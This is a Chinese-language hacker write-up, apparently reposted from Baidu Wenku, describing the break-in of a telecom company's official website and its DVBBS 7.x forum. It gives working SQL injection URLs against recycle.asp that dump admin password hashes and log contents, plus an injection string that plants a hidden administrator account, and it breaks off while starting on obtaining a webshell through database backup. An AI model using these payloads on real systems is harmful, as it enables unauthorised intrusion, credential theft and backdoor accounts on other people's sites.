渗透一电信官方站点
来源:百度文库 编辑:神马文学网 时间:2024/05/22 05:32:31
渗透一电信官方站点
一、踩点:http://xxx.online.xx.xx XX电信的站点,这个站是我一直都想拿下的,首页存在注入点,是sa
登陆,数据库是放另一外网的主机,那台主机禁止对外连接,但是可以上网,对外不开放端口。
http://xxx.online.xx.xx/bbs为其论谈,是access+dvbbs7.0 sp2.
二、拿下aspshell
动网前台提权的方法我就不多说了,jinsdb给的工具,很快就提完前台。不抓图,继续.
得到前台后就是对拿后台。动网recycle.asp过滤不严,导致注入漏洞的存在,先说一下,漏洞不是我发现的,构造注入点如下:
http://xxx.online.xx.xx/bbs/recycle.asp?tablename=Dv_bbs1 union select 1,2,l_content,4,5,6 from dv_log where l_id>0 union select 1,1,1,1,1,1 from dv_bbs1&page=7
这里要注意的是,这个漏洞的前提是以前台管理员身份登陆,对access和mssql的dvbbs 7.x通杀,通过上面的构造,就可以暴出l_content的内容
这里还要说的是,最后面的&page=7,通过上面的注入语句是暴出所有l_content的值,但是动网一个界面只能显示10多条,所以大家通过修改
page的值来找l_content的内容,一般是在最后几个数字,这个page是回收站的页数,如果一共有130页,你一般从120开始,这样,通过121,122
,一直累注上去,直到找出password的明文,如果你懂点sql的话,当然也可以用来暴管理员的散列,只是变换一下注入语句而已,如:
http://xxx.online.xx.xx/bbs/recycle.asp?tablename=Dv_bbs1 union select 1,2,password,4,5,6 from dv_admin where password>0 union select 1,1,1,1,1,1 from dv_bbs1&page=7
利用上面的注射方式,可以暴出l_content的值,当然,如果你想暴dv_admin的话,只要构造一下注射语句就可以了。利用这种注册很快暴出
前后台的账号和密码。如图一:
而对于sql方法更多,动网的其它文件也存在注入漏洞,如:先查看一下随便一个用户的资料,在最下面的奖惩处点一下,如图二:
接着在操作理由里输入:
test ,没有对用户进行分值操作’,’127.0.0.1’,5) ;insert into dv_admin (username,[password],flag,adduser) values (’linzi123’,’7412b5da7be0cf42’,’1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37’,’linzi123’);--
这样在后台就加了一个linzi123的用户。进到后台后,sql的和access在备份的地方有些不同,偶给大家一个备份得shell的文件databack.htm.
打开他的源代码,找到语句